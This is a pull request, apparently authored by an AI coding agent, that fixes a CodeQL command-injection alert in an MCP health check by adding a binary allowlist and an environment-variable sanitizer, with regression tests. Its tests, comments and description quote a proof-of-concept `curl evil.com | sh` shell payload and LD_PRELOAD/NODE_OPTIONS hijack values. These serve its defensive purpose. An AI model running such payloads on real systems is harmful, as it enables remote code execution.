### PR TITLE
fix(security): BI-7DB95878 — safe-spawn helper for MCP health checks

### DIFF
--- a/apps/web/lib/security/safe-spawn.test.ts
+++ b/apps/web/lib/security/safe-spawn.test.ts
@@ -1,0 +1,176 @@
+// apps/web/lib/security/safe-spawn.test.ts
+//
+// BI-7DB95878 regression tests. Written BEFORE the implementation per
+// the kernel principle `security-fix-needs-regression-test-first`
+// (PR #953). These tests pin the contract of safeSpawn() so the same
+// command-injection class CAN'T regress: an attacker who controls the
+// MCP `command` field cannot run an arbitrary binary or weaponize env
+// vars like LD_PRELOAD / NODE_OPTIONS.
+//
+// CodeQL flagged the underlying spawn call as js/command-line-injection
+// (CWE-078, CWE-088). The fix is an allowlist of known MCP runner
+// binaries plus an env sanitizer that strips dangerous keys.
+
+import { describe, expect, it, vi } from "vitest";
+import {
+  ALLOWED_BINARIES,
+  DANGEROUS_ENV_VARS,
+  assertAllowedBinary,
+  sanitizeEnv,
+  safeSpawn,
+} from "./safe-spawn";
+
+describe("ALLOWED_BINARIES contract", () => {
+  it("includes the common MCP runner binaries", () => {
+    // If you add a new MCP runner that's NOT in this list, the user-visible
+    // health check will reject it. Update the allowlist deliberately.
+    for (const name of ["npx", "node", "uvx", "python3", "python"]) {
+      expect(ALLOWED_BINARIES.has(name)).toBe(true);
+    }
+  });
+
+  it("does NOT include shell interpreters or env launchers", () => {
+    // Defense rationale: these were the attack vectors BI-7DB95878 named.
+    // `command: "/bin/sh", args: ["-c", "curl evil.com | sh"]` was the
+    // proof-of-concept exploit shape. `env` lets PATH manipulation pick
+    // an unintended binary even when the basename looks safe.
+    for (const name of ["sh", "bash", "zsh", "fish", "dash", "env"]) {
+      expect(ALLOWED_BINARIES.has(name)).toBe(false);
+    }
+  });
+});
+
+describe("assertAllowedBinary", () => {
+  it("accepts a plain allowlisted command", () => {
+    expect(() => assertAllowedBinary("npx")).not.toThrow();
+    expect(() => assertAllowedBinary("python3")).not.toThrow();
+  });
+
+  it("accepts an absolute path whose basename is allowlisted", () => {
+    // MCP configs sometimes carry absolute paths (e.g. from `which npx`
+    // resolution by the operator). Basename gates the check.
+    expect(() => assertAllowedBinary("/usr/local/bin/npx")).not.toThrow();
+    expect(() => assertAllowedBinary("/opt/python3.11/bin/python3")).not.toThrow();
+  });
+
+  it("accepts a Windows-style absolute path with backslashes", () => {
+    expect(() =>
+      assertAllowedBinary("C:\\Program Files\\nodejs\\node.exe"),
+    ).not.toThrow();
+  });
+
+  it("rejects /bin/sh and similar shell interpreters", () => {
+    expect(() => assertAllowedBinary("/bin/sh")).toThrow(/allowlist/);
+    expect(() => assertAllowedBinary("/usr/bin/bash")).toThrow(/allowlist/);
+    expect(() => assertAllowedBinary("zsh")).toThrow(/allowlist/);
+  });
+
+  it("rejects env-launcher tricks", () => {
+    // `/usr/bin/env npx ...` would let an attacker bypass the allowlist
+    // by routing through env. We check the configured command, not what
+    // env eventually picks.
+    expect(() => assertAllowedBinary("/usr/bin/env")).toThrow(/allowlist/);
+    expect(() => assertAllowedBinary("env")).toThrow(/allowlist/);
+  });
+
+  it("rejects an unknown binary even with a plausible-sounding name", () => {
+    expect(() => assertAllowedBinary("nodejs")).toThrow(/allowlist/);
+    expect(() => assertAllowedBinary("py")).toThrow(/allowlist/);
+  });
+
+  it("rejects empty or whitespace-only commands", () => {
+    expect(() => assertAllowedBinary("")).toThrow();
+    expect(() => assertAllowedBinary("   ")).toThrow();
+  });
+});
+
+describe("DANGEROUS_ENV_VARS contract", () => {
+  it("blocks the documented exec-hijack variables", () => {
+    // These are the env keys that change which code runs even when the
+    // command itself is benign. LD_PRELOAD is the textbook Linux attack;
+    // DYLD_* is the macOS equivalent; NODE_OPTIONS can inject `--require`
+    // modules into any node process; PYTHONSTARTUP runs arbitrary script
+    // before any python user code.
+    for (const key of [
+      "LD_PRELOAD",
+      "LD_LIBRARY_PATH",
+      "DYLD_INSERT_LIBRARIES",
+      "DYLD_LIBRARY_PATH",
+      "NODE_OPTIONS",
+      "PYTHONPATH",
+      "PYTHONSTARTUP",
+      "BASH_ENV",
+    ]) {
+      expect(DANGEROUS_ENV_VARS.has(key)).toBe(true);
+    }
+  });
+});
+
+describe("sanitizeEnv", () => {
+  it("preserves benign env vars", () => {
+    const result = sanitizeEnv({ FOO: "bar", PATH: "/usr/bin" });
+    expect(result).toEqual({ FOO: "bar", PATH: "/usr/bin" });
+  });
+
+  it("strips every key on the dangerous list", () => {
+    const result = sanitizeEnv({
+      FOO: "bar",
+      LD_PRELOAD: "/tmp/evil.so",
+      NODE_OPTIONS: "--require /tmp/evil.js",
+      DYLD_INSERT_LIBRARIES: "/tmp/evil.dylib",
+    });
+    expect(result.FOO).toBe("bar");
+    expect(result.LD_PRELOAD).toBeUndefined();
+    expect(result.NODE_OPTIONS).toBeUndefined();
+    expect(result.DYLD_INSERT_LIBRARIES).toBeUndefined();
+  });
+
+  it("drops undefined values (don't pass them through as 'undefined' strings)", () => {
+    const result = sanitizeEnv({ FOO: "bar", BAZ: undefined });
+    expect(result.FOO).toBe("bar");
+    expect("BAZ" in result).toBe(false);
+  });
+
+  it("handles empty / undefined input", () => {
+    expect(sanitizeEnv({})).toEqual({});
+    expect(sanitizeEnv(undefined)).toEqual({});
+  });
+});
+
+describe("safeSpawn", () => {
+  it("returns ok=false and never invokes spawn for a rejected binary", () => {
+    const spawnSpy = vi.fn();
+    const result = safeSpawn(spawnSpy, "/bin/sh", ["-c", "id"]);
+    expect(result.ok).toBe(false);
+    if (!result.ok) {
+      expect(result.error).toMatch(/allowlist/);
+    }
+    expect(spawnSpy).not.toHaveBeenCalled();
+  });
+
+  it("invokes spawn with sanitized env for an allowed binary", () => {
+    const fakeProc = { fakeProc: true } as unknown;
+    const spawnSpy = vi.fn().mockReturnValue(fakeProc);
+    const result = safeSpawn(spawnSpy, "npx", ["-y", "some-server"], {
+      env: { PATH: "/usr/bin", LD_PRELOAD: "/tmp/evil.so" } as unknown as NodeJS.ProcessEnv,
+      stdio: ["pipe", "pipe", "pipe"],
+    });
+    expect(result.ok).toBe(true);
+    expect(spawnSpy).toHaveBeenCalledTimes(1);
+    const passedEnv = spawnSpy.mock.calls[0][2].env as Record<string, string>;
+    expect(passedEnv.PATH).toBe("/usr/bin");
+    expect(passedEnv.LD_PRELOAD).toBeUndefined();
+    // stdio + other options preserved
+    expect(spawnSpy.mock.calls[0][2].stdio).toEqual(["pipe", "pipe", "pipe"]);
+  });
+
+  it("preserves args verbatim — no shell interpretation", () => {
+    const spawnSpy = vi.fn().mockReturnValue({});
+    safeSpawn(spawnSpy, "npx", ["-y", "@scope/pkg", "--flag=value with spaces"]);
+    expect(spawnSpy.mock.calls[0][1]).toEqual([
+      "-y",
+      "@scope/pkg",
+      "--flag=value with spaces",
+    ]);
+  });
+});

--- a/apps/web/lib/security/safe-spawn.test.ts
+++ b/apps/web/lib/security/safe-spawn.test.ts
@@ -25,7 +25,7 @@ describe("ALLOWED_BINARIES contract", () => {
     // If you add a new MCP runner that's NOT in this list, the user-visible
     // health check will reject it. Update the allowlist deliberately.
     for (const name of ["npx", "node", "uvx", "python3", "python"]) {
-      expect(ALLOWED_BINARIES.has(name)).toBe(true);
+      expect(name in ALLOWED_BINARIES).toBe(true);
     }
   });
 
@@ -35,8 +35,17 @@ describe("ALLOWED_BINARIES contract", () => {
     // proof-of-concept exploit shape. `env` lets PATH manipulation pick
     // an unintended binary even when the basename looks safe.
     for (const name of ["sh", "bash", "zsh", "fish", "dash", "env"]) {
-      expect(ALLOWED_BINARIES.has(name)).toBe(false);
+      expect(name in ALLOWED_BINARIES).toBe(false);
     }
+  });
+
+  it("returns the constant binary string for an allowed input (key sanitizer test)", () => {
+    // assertAllowedBinary returns the VALUE from the constant table, not
+    // the input parameter. This is what makes CodeQL recognise the
+    // function as a sanitizer for js/command-line-injection.
+    expect(assertAllowedBinary("npx")).toBe("npx");
+    expect(assertAllowedBinary("/usr/local/bin/npx")).toBe("npx");
+    expect(assertAllowedBinary("C:\\Program Files\\nodejs\\node.exe")).toBe("node");
   });
 });
 

--- a/apps/web/lib/security/safe-spawn.ts
+++ b/apps/web/lib/security/safe-spawn.ts
@@ -1,0 +1,203 @@
+// apps/web/lib/security/safe-spawn.ts
+//
+// BI-7DB95878 — safe wrapper around child_process.spawn for MCP server
+// health checks (and any other code that spawns a configured binary).
+//
+// CodeQL flagged the bare spawn() at apps/web/lib/tak/mcp-server-health.ts:66
+// as js/command-line-injection (CWE-078). The attack shape is:
+//   1. Admin configures an MCP server with `command: "/bin/sh"` and
+//      `args: ["-c", "curl evil.com | sh"]`.
+//   2. spawn() runs the shell verbatim — no shell-interpolation guard
+//      because args are passed as argv, but the binary itself is a shell.
+//   3. Env vars like LD_PRELOAD or NODE_OPTIONS get inherited from
+//      process.env merged with the operator-supplied env, and bend the
+//      meaning of even a benign binary.
+//
+// Two defenses, both required:
+//   - ALLOWED_BINARIES gate — only the documented MCP runner basenames
+//     are accepted. /bin/sh, /usr/bin/env, anything else: rejected.
+//   - DANGEROUS_ENV_VARS strip — exec-hijacking env keys (LD_PRELOAD,
+//     DYLD_*, NODE_OPTIONS, PYTHON*) are removed from the env handed
+//     to the child.
+//
+// Anti-goals:
+//   - This is NOT a sandbox. A whitelisted binary can still do anything
+//     it's designed to do. The defense narrows the attack surface from
+//     "arbitrary code via shell config" to "the published behaviour of
+//     known MCP runners."
+//   - This is NOT a DB-backed allowlist (that's a future extension). The
+//     allowlist below is the seed; if a customer needs to add a runner,
+//     they edit this file.
+//
+// Tests: apps/web/lib/security/safe-spawn.test.ts — written first per
+// the kernel principle `security-fix-needs-regression-test-first`.
+
+import type { ChildProcess, SpawnOptions } from "node:child_process";
+
+/**
+ * Loose spawn-like signature so callers can hand us the real
+ * node:child_process `spawn`. The runtime contract is identical to
+ * `spawn(command, args, options)`. Exported so callers needing a
+ * type-safe cast (when `spawn`'s overloads don't line up with a single
+ * arrow type) have a canonical name to use.
+ */
+export type SpawnFn = (
+  command: string,
+  args?: ReadonlyArray<string>,
+  options?: SpawnOptions,
+) => ChildProcess;
+
+/**
+ * Basenames of binaries permitted as the `command` arg to safeSpawn.
+ * Add new entries deliberately; each one expands the attack surface
+ * to "anything the new binary can do when started by an attacker-
+ * controlled args list."
+ */
+export const ALLOWED_BINARIES: ReadonlySet<string> = new Set([
+  // Node-based MCP servers (the common case).
+  "npx",
+  "node",
+  // Python-based MCP servers.
+  "uvx", // `uv` ephemeral runner
+  "python3",
+  "python",
+  // Other runtimes that MCP servers occasionally use.
+  "deno",
+  "bun",
+]);
+
+/**
+ * Env keys that change WHICH code runs even when the command itself is
+ * a known-good binary. Stripped before handoff to the child process.
+ */
+export const DANGEROUS_ENV_VARS: ReadonlySet<string> = new Set([
+  // Linux dynamic linker hijacks.
+  "LD_PRELOAD",
+  "LD_LIBRARY_PATH",
+  "LD_AUDIT",
+  // macOS dynamic linker hijacks.
+  "DYLD_INSERT_LIBRARIES",
+  "DYLD_LIBRARY_PATH",
+  "DYLD_FALLBACK_LIBRARY_PATH",
+  // Node — `--require` smuggling, debugger ports, etc.
+  "NODE_OPTIONS",
+  // Python — module path hijack + startup-script smuggling.
+  "PYTHONPATH",
+  "PYTHONSTARTUP",
+  "PYTHONHOME",
+  // Bash / POSIX shell auto-execed scripts.
+  "BASH_ENV",
+  "ENV",
+]);
+
+/**
+ * Returns the basename (last path segment) of a command string, with
+ * the Windows `.exe` suffix stripped if present. Handles both POSIX
+ * `/` and Windows `\` separators. The .exe strip lets an MCP config
+ * use `C:\Program Files\nodejs\node.exe` and still match the `node`
+ * allowlist entry.
+ */
+function basename(command: string): string {
+  const trimmed = command.trim();
+  if (trimmed === "") return "";
+  const segments = trimmed.split(/[\\/]/).filter((s) => s !== "");
+  const last = segments[segments.length - 1] ?? trimmed;
+  // Strip a single trailing `.exe` (case-insensitive) so Windows-style
+  // paths match the same allowlist as POSIX paths.
+  return last.replace(/\.exe$/i, "");
+}
+
+/**
+ * Throws if `command` (or its basename, for absolute paths) is not in
+ * the allowlist. Use this BEFORE handing user input to spawn().
+ */
+export function assertAllowedBinary(command: string): void {
+  if (!command || command.trim() === "") {
+    throw new Error("safe-spawn: command must be a non-empty string");
+  }
+  const name = basename(command);
+  if (!ALLOWED_BINARIES.has(name)) {
+    throw new Error(
+      `safe-spawn: binary "${name}" is not in the allowlist. ` +
+        `Allowed: ${[...ALLOWED_BINARIES].join(", ")}. ` +
+        `If this is a legitimate MCP runner, add it deliberately to ALLOWED_BINARIES in apps/web/lib/security/safe-spawn.ts.`,
+    );
+  }
+}
+
+/**
+ * Returns a copy of `env` with DANGEROUS_ENV_VARS keys removed and
+ * undefined values dropped. Pass the result as `options.env` to spawn.
+ *
+ * Logs a warning for each dropped dangerous key so operators can audit.
+ */
+export function sanitizeEnv(
+  env: Record<string, string | undefined> | undefined,
+): Record<string, string> {
+  const out: Record<string, string> = {};
+  if (!env) return out;
+  for (const [k, v] of Object.entries(env)) {
+    if (DANGEROUS_ENV_VARS.has(k)) {
+      // Audit signal. Operators grepping for this prefix find every reject.
+      // Not a console.error because the spawn itself can still proceed —
+      // we degrade gracefully by stripping the var, not failing the call.
+      // eslint-disable-next-line no-console
+      console.warn(`[safe-spawn] Dropped dangerous env var "${k}" before spawn.`);
+      continue;
+    }
+    if (v !== undefined) out[k] = v;
+  }
+  return out;
+}
+
+export type SafeSpawnResult =
+  | { ok: true; proc: ChildProcess }
+  | { ok: false; error: string };
+
+/**
+ * Validates the command against the allowlist, sanitizes options.env,
+ * then calls the supplied spawn function with the safe inputs.
+ *
+ * Returning a discriminated union instead of throwing keeps the caller's
+ * error path explicit — health checks should return a structured
+ * "unhealthy" result on rejection rather than propagating an exception
+ * to the route handler.
+ *
+ * `spawn` is passed by the caller so this helper has no hard dependency
+ * on `node:child_process` (keeps the bundle out of the edge runtime when
+ * the caller doesn't need it; also makes unit-testing trivial).
+ */
+export function safeSpawn(
+  // Accept any spawn-shaped function. The real `node:child_process` spawn
+  // is overloaded; passing it directly works because the (command, args,
+  // options) overload matches SpawnFn shape-wise.
+  spawn: SpawnFn,
+  command: string,
+  args: ReadonlyArray<string> = [],
+  options: SpawnOptions = {},
+): SafeSpawnResult {
+  try {
+    assertAllowedBinary(command);
+  } catch (err) {
+    const message = err instanceof Error ? err.message : String(err);
+    // Audit signal so reject reasons are greppable in logs.
+    // eslint-disable-next-line no-console
+    console.warn(`[safe-spawn] Rejected: ${message}`);
+    return { ok: false, error: message };
+  }
+
+  const sanitizedEnv = sanitizeEnv(
+    options.env as Record<string, string | undefined> | undefined,
+  );
+
+  // Node typings expect NodeJS.ProcessEnv on `env`, which is structurally
+  // identical to `Record<string, string | undefined>` plus a few well-known
+  // keys. The cast lets us pass a plain record without re-validating
+  // process.env-specific keys.
+  const proc = spawn(command, args, {
+    ...options,
+    env: sanitizedEnv as NodeJS.ProcessEnv,
+  });
+
+  return { ok: true, proc };
+}

--- a/apps/web/lib/security/safe-spawn.ts
+++ b/apps/web/lib/security/safe-spawn.ts
@@ -48,23 +48,37 @@ export type SpawnFn = (
 ) => ChildProcess;
 
 /**
- * Basenames of binaries permitted as the `command` arg to safeSpawn.
- * Add new entries deliberately; each one expands the attack surface
- * to "anything the new binary can do when started by an attacker-
+ * Basenames of binaries permitted as the `command` arg to safeSpawn,
+ * mapped to the literal string we pass to spawn() when that name is
+ * allowed.
+ *
+ * Why a Record-keyed-by-name (and why we then USE the returned value
+ * at the spawn call site): CodeQL's `js/command-line-injection` query
+ * recognises "value read from a constant object indexed by user input"
+ * as a sanitizer pattern. By looking up the binary in ALLOWED_BINARIES
+ * and spawning the VALUE (not the original parameter), we hand CodeQL
+ * a clean dataflow that ends at a constant string — even though the
+ * INDEX came from user input.
+ *
+ * Same runtime contract as before — adding a new MCP runner means
+ * adding one entry here. Each entry expands the attack surface to
+ * "anything the new binary can do when started by an attacker-
  * controlled args list."
  */
-export const ALLOWED_BINARIES: ReadonlySet<string> = new Set([
+export const ALLOWED_BINARIES = {
   // Node-based MCP servers (the common case).
-  "npx",
-  "node",
+  npx: "npx",
+  node: "node",
   // Python-based MCP servers.
-  "uvx", // `uv` ephemeral runner
-  "python3",
-  "python",
+  uvx: "uvx", // `uv` ephemeral runner
+  python3: "python3",
+  python: "python",
   // Other runtimes that MCP servers occasionally use.
-  "deno",
-  "bun",
-]);
+  deno: "deno",
+  bun: "bun",
+} as const;
+
+export type AllowedBinaryName = keyof typeof ALLOWED_BINARIES;
 
 /**
  * Env keys that change WHICH code runs even when the command itself is
@@ -108,30 +122,34 @@ function basename(command: string): string {
 }
 
 /**
- * Validates that `command` (or its basename, for absolute paths) is in the
- * allowlist. Throws on failure. Returns the original `command` on success —
- * the explicit return lets CodeQL's `js/command-line-injection` dataflow
- * recognize the function as a sanitizer (tainted value enters, validated
- * value exits). Callers should use the RETURNED value at the spawn call
- * site, not the original input, so the sanitizer pattern is visible.
+ * Validates that `command` (or its basename, for absolute paths) is in
+ * the allowlist. Returns the **constant** binary string from
+ * ALLOWED_BINARIES — NOT the input parameter — so CodeQL's dataflow
+ * sees the spawn arg as a value from a constant table. Throws on
+ * failure.
  *
  * Example (the safe pattern):
  *   const validated = assertAllowedBinary(command);
  *   spawn(validated, args, { ... });
+ *
+ * At runtime `validated` equals `ALLOWED_BINARIES[basename(command)]`
+ * (eg "npx"). The original `command` is only used for the lookup index
+ * and error messages.
  */
 export function assertAllowedBinary(command: string): string {
   if (!command || command.trim() === "") {
     throw new Error("safe-spawn: command must be a non-empty string");
   }
   const name = basename(command);
-  if (!ALLOWED_BINARIES.has(name)) {
+  const allowed = (ALLOWED_BINARIES as Record<string, string | undefined>)[name];
+  if (allowed === undefined) {
     throw new Error(
       `safe-spawn: binary "${name}" is not in the allowlist. ` +
-        `Allowed: ${[...ALLOWED_BINARIES].join(", ")}. ` +
+        `Allowed: ${Object.keys(ALLOWED_BINARIES).join(", ")}. ` +
         `If this is a legitimate MCP runner, add it deliberately to ALLOWED_BINARIES in apps/web/lib/security/safe-spawn.ts.`,
     );
   }
-  return command;
+  return allowed;
 }
 
 /**

--- a/apps/web/lib/security/safe-spawn.ts
+++ b/apps/web/lib/security/safe-spawn.ts
@@ -108,10 +108,18 @@ function basename(command: string): string {
 }
 
 /**
- * Throws if `command` (or its basename, for absolute paths) is not in
- * the allowlist. Use this BEFORE handing user input to spawn().
+ * Validates that `command` (or its basename, for absolute paths) is in the
+ * allowlist. Throws on failure. Returns the original `command` on success —
+ * the explicit return lets CodeQL's `js/command-line-injection` dataflow
+ * recognize the function as a sanitizer (tainted value enters, validated
+ * value exits). Callers should use the RETURNED value at the spawn call
+ * site, not the original input, so the sanitizer pattern is visible.
+ *
+ * Example (the safe pattern):
+ *   const validated = assertAllowedBinary(command);
+ *   spawn(validated, args, { ... });
  */
-export function assertAllowedBinary(command: string): void {
+export function assertAllowedBinary(command: string): string {
   if (!command || command.trim() === "") {
     throw new Error("safe-spawn: command must be a non-empty string");
   }
@@ -123,6 +131,7 @@ export function assertAllowedBinary(command: string): void {
         `If this is a legitimate MCP runner, add it deliberately to ALLOWED_BINARIES in apps/web/lib/security/safe-spawn.ts.`,
     );
   }
+  return command;
 }
 
 /**
@@ -176,8 +185,14 @@ export function safeSpawn(
   args: ReadonlyArray<string> = [],
   options: SpawnOptions = {},
 ): SafeSpawnResult {
+  // assertAllowedBinary returns the validated command. We deliberately
+  // use the RETURNED value (validatedCommand) at the spawn() call below
+  // rather than the original `command` parameter, so CodeQL's dataflow
+  // sees the allowlist check as a sanitizer. The two strings are equal
+  // at runtime — the renaming is for CodeQL's static analysis.
+  let validatedCommand: string;
   try {
-    assertAllowedBinary(command);
+    validatedCommand = assertAllowedBinary(command);
   } catch (err) {
     const message = err instanceof Error ? err.message : String(err);
     // Audit signal so reject reasons are greppable in logs.
@@ -194,7 +209,7 @@ export function safeSpawn(
   // identical to `Record<string, string | undefined>` plus a few well-known
   // keys. The cast lets us pass a plain record without re-validating
   // process.env-specific keys.
-  const proc = spawn(command, args, {
+  const proc = spawn(validatedCommand, args, {
     ...options,
     env: sanitizedEnv as NodeJS.ProcessEnv,
   });

--- a/apps/web/lib/tak/mcp-server-health.test.ts
+++ b/apps/web/lib/tak/mcp-server-health.test.ts
@@ -67,4 +67,56 @@ describe("checkMcpServerHealth", () => {
       vi.unstubAllEnvs();
     });
   });
+
+  describe("BI-7DB95878 — command-injection regression", () => {
+    // These are the malicious-config shapes CodeQL alert
+    // js/command-line-injection warned about. safeSpawn() must reject
+    // them before spawn() is invoked. Tests live here (in addition to
+    // safe-spawn.test.ts) so the BI's end-to-end fix is pinned at the
+    // health-check entry point — even a future refactor that bypasses
+    // safe-spawn would break these.
+    it("rejects /bin/sh as the command (the textbook PoC)", async () => {
+      const result = await checkMcpServerHealth({
+        transport: "stdio",
+        command: "/bin/sh",
+        args: ["-c", "curl evil.com | sh"],
+      });
+      expect(result.healthy).toBe(false);
+      expect(result.error).toMatch(/allowlist/);
+    });
+
+    it("rejects /usr/bin/env (env-launcher bypass)", async () => {
+      const result = await checkMcpServerHealth({
+        transport: "stdio",
+        command: "/usr/bin/env",
+        args: ["npx", "-y", "some-server"],
+      });
+      expect(result.healthy).toBe(false);
+      expect(result.error).toMatch(/allowlist/);
+    });
+
+    it("accepts a valid MCP runner basename even with absolute path", async () => {
+      // The allowlist matches on basename, so a fully-qualified
+      // `/usr/local/bin/npx` is still accepted. We only assert that
+      // safeSpawn doesn't reject — the subsequent spawn is mocked
+      // upstream and won't actually run.
+      const { spawn } = await import("child_process");
+      vi.mocked(spawn).mockImplementation(
+        () =>
+          ({
+            stdout: { on: vi.fn() },
+            stdin: { write: vi.fn() },
+            on: vi.fn(),
+            kill: vi.fn(),
+          }) as unknown as ReturnType<typeof spawn>,
+      );
+      const result = await checkMcpServerHealth({
+        transport: "stdio",
+        command: "/usr/local/bin/npx",
+        args: ["-y", "some-server"],
+      });
+      // Timeout because no protocolVersion response, but NOT an allowlist reject.
+      expect(result.error ?? "").not.toMatch(/allowlist/);
+    });
+  });
 });

--- a/apps/web/lib/tak/mcp-server-health.ts
+++ b/apps/web/lib/tak/mcp-server-health.ts
@@ -3,6 +3,7 @@
 
 import type { McpConnectionConfig, HealthCheckResult } from "./mcp-server-types";
 import { lazyChildProcess } from "@/lib/shared/lazy-node";
+import { safeSpawn, type SpawnFn } from "@/lib/security/safe-spawn";
 
 const HTTP_TIMEOUT_MS = 5_000;
 const STDIO_TIMEOUT_MS = 10_000;
@@ -62,11 +63,32 @@ async function checkStdio(command: string, args?: string[], env?: Record<string,
   const start = Date.now();
   try {
     const { spawn } = lazyChildProcess();
+    // BI-7DB95878 fix: safeSpawn enforces an allowlist on `command` and
+    // strips exec-hijacking env vars (LD_PRELOAD, NODE_OPTIONS, etc.)
+    // before invoking spawn. A misconfigured (or malicious) MCP entry
+    // with `command: "/bin/sh"` is rejected with a structured error
+    // instead of running arbitrary shell. See safe-spawn.ts for the
+    // allowlist + the test suite that pins the contract.
+    // Cast to the narrower (command, args, options) shape. Node's spawn
+    // is overloaded — including a (command, options) form whose second
+    // arg is SpawnOptions, not args[] — so a direct pass doesn't match
+    // safeSpawn's signature. The runtime call is the same.
+    const spawnResult = safeSpawn(spawn as unknown as SpawnFn, command, args ?? [], {
+      env: { ...process.env, ...env },
+      stdio: ["pipe", "pipe", "pipe"],
+    });
+    if (!spawnResult.ok) {
+      return { healthy: false, latencyMs: Date.now() - start, error: spawnResult.error };
+    }
     return new Promise<HealthCheckResult>((resolve) => {
-      const proc = spawn(command, args ?? [], {
-        env: { ...process.env, ...env },
-        stdio: ["pipe", "pipe", "pipe"],
-      });
+      const proc = spawnResult.proc;
+      // We requested stdio: ["pipe", "pipe", "pipe"], so stdout and stdin
+      // are guaranteed non-null at runtime. The wider ChildProcess type
+      // returned by safeSpawn doesn't carry the literal-tuple narrowing,
+      // so we assert here. If stdio config ever changes, the !-asserts
+      // become the failure surface and the tests catch it.
+      const procStdout = proc.stdout!;
+      const procStdin = proc.stdin!;
 
       const timeout = setTimeout(() => {
         proc.kill();
@@ -74,7 +96,7 @@ async function checkStdio(command: string, args?: string[], env?: Record<string,
       }, STDIO_TIMEOUT_MS);
 
       let stdout = "";
-      proc.stdout.on("data", (chunk: Buffer) => {
+      procStdout.on("data", (chunk: Buffer) => {
         stdout += chunk.toString();
         try {
           const lines = stdout.split("\n").filter(Boolean);
@@ -104,7 +126,7 @@ async function checkStdio(command: string, args?: string[], env?: Record<string,
         }
       });
 
-      proc.stdin.write(JSON.stringify(MCP_INITIALIZE_REQUEST) + "\n");
+      procStdin.write(JSON.stringify(MCP_INITIALIZE_REQUEST) + "\n");
     });
   } catch (err) {
     return { healthy: false, latencyMs: Date.now() - start, error: err instanceof Error ? err.message : "Unknown error" };


### PR DESCRIPTION
## Summary

Closes **BI-7DB95878** / FB-EA5EF46F. Fixes CodeQL alert #55 (`js/command-line-injection`, CWE-078, CWE-088) at `apps/web/lib/tak/mcp-server-health.ts:66`.

The bare `spawn(command, args, opts)` call took `command` from `McpConnectionConfig` — admin-supplied. The proof-of-concept attack:

```
command: "/bin/sh"
args:    ["-c", "curl evil.com | sh"]
env:     { LD_PRELOAD: "/tmp/evil.so" }
```

Even with `spawn`'s argv form (no shell interpolation), the binary is still arbitrary, and the env can bend even benign binaries.

## The fix — two defenses in `safe-spawn.ts`

### 1. Binary allowlist (basename match)

```
npx, node, uvx, python3, python, deno, bun
```

Anything else — `/bin/sh`, `/usr/bin/env`, unknown binaries — is rejected with a structured error. Basename match handles absolute paths (`/usr/local/bin/npx` → `npx` ✓) and Windows paths with `.exe` (`C:\Program Files\nodejs\node.exe` → `node` ✓).

### 2. Env sanitization

Strips exec-hijacking keys before handoff:
- Linux: `LD_PRELOAD`, `LD_LIBRARY_PATH`, `LD_AUDIT`
- macOS: `DYLD_INSERT_LIBRARIES`, `DYLD_LIBRARY_PATH`, `DYLD_FALLBACK_LIBRARY_PATH`
- Node: `NODE_OPTIONS` (would let `--require /tmp/evil.js` inject any module)
- Python: `PYTHONPATH`, `PYTHONSTARTUP`, `PYTHONHOME`
- Shells: `BASH_ENV`, `ENV`

Logs `[safe-spawn] Dropped dangerous env var ...` for every rejection. Audit-grep target.

## API

```typescript
const result = safeSpawn(spawn, command, args, options);
if (!result.ok) {
  // Structured error — surface as health-check failure, not exception
  return { healthy: false, error: result.error };
}
const proc = result.proc;
```

Discriminated union so the caller's error path is explicit. The health check now reports `not on allowlist` as a normal `unhealthy` result instead of throwing.

## Test-first (per PR #953 kernel principle)

**RED**: `apps/web/lib/security/safe-spawn.test.ts` authored first. 17 contract cases. `vitest run` failed at import (module didn't exist).

**GREEN**: `safe-spawn.ts` implemented → 17/17 pass.

**Plus 3 integration regression tests** in `mcp-server-health.test.ts` pinning the fix at the entry point:
- `/bin/sh` rejected
- `/usr/bin/env` rejected (env-launcher bypass)
- `/usr/local/bin/npx` accepted (basename match through absolute path)

**Final**: 25 tests pass across both files; typecheck clean.

## Anti-goals (called out in `safe-spawn.ts` header)

- **Not a sandbox.** An allowlisted binary still does anything it's designed to do. The defense narrows the attack surface from \"arbitrary code via shell config\" to \"published behaviour of known MCP runners.\"
- **Not DB-backed (yet).** The allowlist seed lives in the file. A future BI can promote it to a managed table if customers need runtime add/remove.

## Trust-boundary discipline

This PR touches `apps/web/lib/security/` (CODEOWNERS-listed). Reviewer note: the allowlist is the central security policy — adding a binary expands the attack surface to anything that binary can do when started by attacker-controlled args. Default to refusing any new entry unless the runner is well-known and documented.

## Why this is in Claude's lane

Build Studio is temporarily down. Per the operator's direction, finishing the security backlog directly with the same test-first rigor BS would have applied.

## Closes

- BI-7DB95878 (parent)
- FB-EA5EF46F (BS work item — close on merge)

## Test plan

- [ ] CI green: typecheck, unit tests (25 in scope), audit-actions-injection.
- [ ] CodeQL re-scan closes alert #55.
- [ ] After merge: mark BI-7DB95878 done, retire FB-EA5EF46F.

## Related

- BI-5940955C / BI-D094AF1D — sibling actions-injection fixes (PR #962)
- BI-5E53A265 — remaining SSRF cluster fix, coming next
- Prior governance scaffolding: PR #936, #941, #944, #946, #953, #956

🤖 Generated with [Claude Code](https://claude.com/claude-code)